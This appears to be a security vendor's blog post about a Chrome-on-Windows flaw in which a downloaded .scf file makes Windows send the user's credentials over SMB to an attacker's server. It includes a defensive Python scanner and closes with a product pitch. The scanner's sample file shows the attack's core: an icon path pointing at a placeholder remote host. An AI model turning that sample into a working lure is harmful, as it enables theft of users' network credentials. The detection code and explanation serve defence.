The rise of Chrome usage in companies is indisputable. Despite the fact that, as Gartner analyst David Michal Smith has indicated, “Microsoft retains a very strong relationship” with IT departments at enterprises, Chrome is the “most-used browser” at businesses. According to market-share data from Net Applications, Chrome holds 59%, while Microsoft’s two browsers, Edge and Internet Explorer, hold only 24% combined.
Despite the growing popularity of Google Chrome, its use on Windows may pose a serious risk to businesses: a security hole in the browser that enables the theft of the credentials used to access the Microsoft operating system.
The Problem: Automatic Downloads
The process of exploiting this vulnerability, discovered by Bosko Stankovic, a security researcher at Defense Code, is quite simple. The attack combines two techniques (one taken from the Stuxnet campaign and another from a method presented at the Black Hat 2015 conference) to carry out attacks that transmit credentials over SMB (Server Message Block).
By default, Chrome automatically downloads the files it considers safe. However, for a malicious file to do its work, the user normally has to open or execute it afterwards. Therefore, when in doubt, you can delete the downloaded file and will not suffer any attack.
The problem with the Chrome security hole in question is that it lets an attacker have the browser download a malicious file and get it executed without the user’s authorization.
It works as follows. The attacker tricks the user into clicking a link that downloads a .scf file, the same kind of file that acts as a shortcut to show the desktop in Windows. That file remains inactive until the user opens the download folder, but as soon as the folder is opened, the file is processed automatically and Windows looks for the icon associated with the .scf file. A connection is then made to the attacker’s server and, in order to fetch the icon, the user’s computer presents its credentials to that server. In other words, the attacker gets your username and password handed to them on a platter.
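As an added example (not code from the original post or from Defense Code’s research), here is a small Python scanner that inspects a downloads folder for .scf files whose icon is declared on a remote host, which is the condition that makes Windows reach out over SMB when the folder is opened. The two sample files and the host name REMOTE-HOST.example are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

# An .scf file is a small INI-style text file. Explorer reads the IconFile=
# value in its [Shell] section to draw the icon as soon as the folder is
# displayed, so an icon located on another host causes an outbound SMB
# connection (with authentication) without the user opening the file.
REMOTE_ICON_RE = re.compile(r"^([\\/]{2}[^\\/]+[\\/]|[a-z][a-z0-9+.-]*://)", re.I)

# Constructed samples (not real downloads): the stock Windows "Show Desktop"
# file, and one whose icon points at a placeholder remote host.
BENIGN_SCF = "[Shell]\nCommand=2\nIconFile=explorer.exe,3\n[Taskbar]\nCommand=ToggleDesktop\n"
SUSPICIOUS_SCF = "[Shell]\nCommand=2\nIconFile=\\\\REMOTE-HOST.example\\share\\icon.ico\n"

def scf_icon_target(text: str) -> Optional[str]:
    """Return the IconFile value from the [Shell] section, or None if absent."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        if section == "shell" and sep and key.strip().lower() == "iconfile":
            return value.strip().strip('"')
    return None

def is_remote_icon(target: str) -> bool:
    """True when the icon would be resolved over the network (UNC path or URL)."""
    return REMOTE_ICON_RE.match(target) is not None

def scan_folder(folder: Path) -> List[Tuple[str, str]]:
    """List (file name, icon target) for every .scf whose icon is fetched remotely."""
    findings = []
    for path in folder.rglob("*"):
        if path.is_file() and path.suffix.lower() == ".scf":
            target = scf_icon_target(path.read_text(errors="replace"))
            if target and is_remote_icon(target):
                findings.append((path.name, target))
    return findings

def run_demo() -> List[Tuple[str, str]]:
    """Write the constructed samples into a temporary folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp)
        (folder / "Show Desktop.scf").write_text(BENIGN_SCF)
        (folder / "invoice.scf").write_text(SUSPICIOUS_SCF)
        return scan_folder(folder)

if __name__ == "__main__":
    for name, target in run_demo():
        print(f"{name}: icon would be fetched from {target}")
```

Pointing `scan_folder` at a real downloads directory gives a quick triage check; only the file whose icon lives off-host is reported.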
On a larger scale, what makes this attack important is that it also jeopardizes the security of companies: after compromising a single workstation, the attacker can reuse the captured credentials to direct the attack at other computers on the corporate network, putting company data and the business’s main assets at risk.
How can you avoid this threat?
Google is aware of this security hole in its browser but has not yet published a fix. In the meantime, we should keep in mind that clicking on links in untrusted emails and messages, or downloading files from unknown sources, is usually a pretty bad idea.
The professional security tools developed by Panda Security are a guarantee against this type of attack. Since advanced malware takes advantage of the fact that antivirus solutions have no prior knowledge of its signature, a protection model that is able to detect unknown threats is essential. That’s why the advanced protection of Adaptive Defense, through the continuous monitoring and classification model that it pioneered, proves to be the weapon companies need to counteract such attacks.